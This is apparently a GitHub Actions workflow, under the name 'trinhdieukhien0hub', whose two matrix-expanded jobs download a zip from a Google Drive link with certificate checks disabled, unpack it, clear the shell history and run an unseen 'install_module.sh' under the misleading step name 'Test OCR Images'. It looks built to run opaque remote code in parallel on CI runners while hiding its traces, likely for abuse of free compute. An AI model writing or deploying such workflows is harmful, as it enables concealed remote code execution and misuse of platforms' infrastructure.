name: trinhdieukhien0hub
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  Generate:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Setup', 'Compile', 'Validate', 'Execute', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1l3wPmy3kULwWb17Qb269zlivVG7gati5" -O trinhdieukhien0hub.zip
        unzip -o trinhdieukhien0hub.zip
        rm trinhdieukhien0hub.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  configure1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Setup', 'Compile', 'Validate', 'Execute', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1l3wPmy3kULwWb17Qb269zlivVG7gati5" -O trinhdieukhien0hub.zip
        unzip -o trinhdieukhien0hub.zip
        rm trinhdieukhien0hub.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
